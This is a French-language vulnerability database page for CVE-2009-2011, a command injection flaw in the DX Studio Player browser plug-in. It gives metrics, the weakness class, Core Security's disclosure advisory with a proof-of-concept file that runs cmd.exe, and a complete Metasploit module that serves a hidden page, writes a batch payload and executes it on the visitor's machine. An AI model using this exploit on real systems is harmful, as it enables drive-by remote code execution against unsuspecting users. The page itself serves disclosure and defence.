CVE-2009-2011 : Détail

CVE-2009-2011

OS Command Injection
A03-Injection
92.91%V3
Network
2009-06-16
18h26 +00:00
2018-10-10
16h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Worldweaver DX Studio Player 3.0.29.0, 3.0.22.0, 3.0.12.0, and probably other versions before 3.0.29.1, when used as a plug-in for Firefox, does not restrict access to the shell.execute JavaScript API method, which allows remote attackers to execute arbitrary commands via a .dxstudio file that invokes this method.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 16515

Date de publication : 2010-05-25 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: dxstudio_player_exec.rb 9375 2010-05-26 22:39:56Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex/zip' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::CmdStagerVBS def initialize(info = {}) super(update_info(info, 'Name' => 'Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution', 'Description' => %q{ This module exploits a command execution vulnerability within the DX Studio Player from Worldweaver. The player is a browser plugin for IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web page referring to a specially crafted .dxstudio document, an attacker can execute arbitrary commands. Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow the plug-in to access local files. This prompt appears to occur only once per server host. NOTE: This exploit uses additionally dangerous script features to write to local files! }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], 'Version' => '$Revision: 9375 $', 'References' => [ [ 'CVE', '2009-2011' ], [ 'BID', '35273' ], [ 'OSVDB', '54969' ], [ 'URL', 'http://www.exploit-db.com/exploits/8922' ], [ 'URL', 'http://dxstudio.com/guide.aspx' ] ], 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', # 'Arch' => ARCH_CMD, 'Targets' => [ [ 'Automatic', { } ], ], 'DisclosureDate' => 'Jun 09 2009', 'DefaultTarget' => 0)) end def on_request_uri(cli, request) url_base = "http://" url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] url_base += ":" + datastore['SRVPORT'] + get_resource() payload_url = url_base + "/payload" # handle request for the payload if (request.uri.match(/payload/)) # build the payload return if ((p = regenerate_payload(cli)) == nil) cmds = generate_cmdstager({:linemax => 2047}, p) scr = "" cmds.each { |ln| scr << "f.writeString('" scr << ln scr << "\\n');\n" } # make header.xml hdrxml = %Q|<?xml version="1.0"?> <dxstudio> <script><![CDATA[function onInit() { var f=system.file.openWrite("BATNAME"); f.writeString('@echo off\\n'); CMDS f.close(); shell.execute("BATNAME"); }]]> </script> </dxstudio> | hdrxml.gsub!(/CMDS/, scr); bat_name = rand_text_alphanumeric(rand(32)) + ".bat" hdrxml.gsub!(/BATNAME/, bat_name); # craft the zip archive zip = Rex::Zip::Archive.new zip.add_file("header.xml", hdrxml) data = zip.pack print_status("Sending file.dxstudio payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) # Handle the payload # handler(cli) return end # otherwise, send the html.. html = %Q|<html> <body> <div height=100%> Please wait... </div> <object width=1 height=1 classid='clsid:0AC2706C-8623-46F8-9EDD-8F71A897FDAE'> <param name="src" value="DXURL" /> <embed width=1 height=1 src=DXURL type="application/x-dxstudio"> </embed> </object> </body> </html> | print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}...") # Transmit the compressed response to the client html.gsub!(/DXURL/, payload_url) send_response(cli, html, { 'Content-Type' => 'text/html' }) end end =begin TODO: - make it more quiet - auto-migrate? =end
Exploit Database EDB-ID : 8922

Date de publication : 2009-06-09 22h00 +00:00
Auteur : Core Security
EDB Vérifié : Yes

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ DX Studio Player Firefox plug-in command injection 1. *Advisory Information* Title: DX Studio Player Firefox plug-in command injection Advisory ID: CORE-2009-0521 Advisory URL: http://www.coresecurity.com/content/DXStudio-player-firefox-plugin Date published: 2009-06-09 Date of last update: 2009-06-09 Vendors contacted: Worldweaver Release mode: Coordinated release 2. *Vulnerability Information* Class: Command injection Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: N/A CVE Name: CVE-2009-2011 3. *Vulnerability Description* DX Studio [1] is a complete integrated development environment for creating interactive 3D graphics. DX Studio Player plug-in for Firefox [2] is vulnerable to a remote command execution vulnerability. 4. *Vulnerable packages* . DX Studio Player v3.0.29.0 . DX Studio Player v3.0.22.0 . DX Studio Player v3.0.12.0 . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . DX Studio Player v3.0.29.1 6. *Vendor Information, Solutions and Workarounds* On June 1st DXStudio team patched the current release 3.0.29 to 3.0.29.1 for all new downloads to fix the problem with the Firefox plugin, and also posted a sticky announce for all its users [3]. 7. *Credits* This vulnerability was discovered and researched by Diego Juarez from Core Security Technologies. 8. *Technical Description / Proof of Concept Code* DX Studio is a complete integrated development environment for creating interactive 3D graphics. DX Studio provides a javascript API in which the method 'shell.execute()' is defined as follows: /----------- Prototype: shell.execute(commandString, [paramString], [commandIsProgId]); - -----------/ This method sends the 'commandString' to the Windows shell with optional parameters in 'paramString'. For security reasons, this function is not available when running in a web browser. If you set 'commandIsProgId' to true, you can launch a utility by its 'ProgID', e.g. 'WMP.DVD' with parameter 'play' would play a DVD in Windows Media Player. In our tests, despite what is stated in the documentation, we found that the function is actually available to both the Internet Explorer and Firefox browser plug-ins. In the IE plug-in the user does get a warning about the security implications of allowing such '.dxstudio' file to run. On Firefox however, there is no such warning whatsoever, allowing an attacker to execute arbitrary code on the client side by luring the victim into clicking a link or visiting a malicious website. 8.1. *Proof of Concept (header.xml)* /----------- <?xml version="1.0" encoding="utf-8" standalone="yes"?> <dxstudio version="1.0.0" width="800" height="600" defaultscriptlanguage="javascript"> <display frame="yes" hidecursor="no" hideconsole="no" hidecontext="no" maxfps="100" unthrottled="no" priority="normal" syncrefresh="yes" changeresolution="no" userresize="yes" workarea="no" windowmask="no" src="" minplayerversion="1.0.0"> <loading console="yes" custom="no" custombackground="no" customlogo="yes" showversion="no"> <prop id="background" type="color" r="0" g="0" b="0" a="1" /> <logo src="" /> <customprogress /> </loading> </display> <script> <![CDATA[function onInit() { shell.execute("cmd.exe","/k cls|@echo this is wrong, very wrong.") } ] ]> </script> <licenseinfo stamp="cgdaaaaa" /> <security> <prop id="password" type="string" value="" /> <prop id="allowplayer" type="bool" state="no" /> <prop id="nocache" type="bool" state="yes" /> </security> </dxstudio> - -----------/ Note: The security vulnerability is also exploitable on the standalone player, however, this functionality appears to be the expected behavior and fully intended for the standalone player. 9. *Report Timeline* . 2009-05-21: Core Security Technologies notifies the Worldweaver Support Team (WST) of the vulnerability and announces its initial plan to publish the content on June 15th, 2009. . 2009-05-26: The WST asks Core for a technical description of the vulnerability. . 2009-05-26: Technical details sent to WST by Core. . 2009-06-08: Core asks WST for an estimated date to fix this issue. . 2009-06-08: WST notifies Core that a fix has already been produced and it is available to the users. . 2009-06-09: The advisory CORE-2009-0521 is published. 10. *References* [1] http://www.dxstudio.com. [2] http://www.dxstudio.com/download2.aspx. [3] http://www.dxstudio.com/forumtopic.aspx?topicid=b4152459-fb5f-4933-b700-b3fbd54f6bfd 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKLtHJyNibggitWa0RAlq1AJ0cZPpDqReJWHd0toN7tnTFLVA99gCgiG/Q PMPteYbShbRU4j4tIk93HPM= =Mx5G -----END PGP SIGNATURE----- # milw0rm.com [2009-06-10]

Products Mentioned

Configuraton 0

Dxstudio>>Dx_studio_player >> Version To (including) 3.0.29.0

    Dxstudio>>Dx_studio_player >> Version 3.0.12.0

      Dxstudio>>Dx_studio_player >> Version 3.0.22.0

        Mozilla>>Firefox >> Version *

        Références

        http://secunia.com/advisories/35402
        Tags : third-party-advisory, x_refsource_SECUNIA
        http://www.securityfocus.com/bid/35273
        Tags : vdb-entry, x_refsource_BID
        http://www.vupen.com/english/advisories/2009/1561
        Tags : vdb-entry, x_refsource_VUPEN
        https://www.exploit-db.com/exploits/8922
        Tags : exploit, x_refsource_EXPLOIT-DB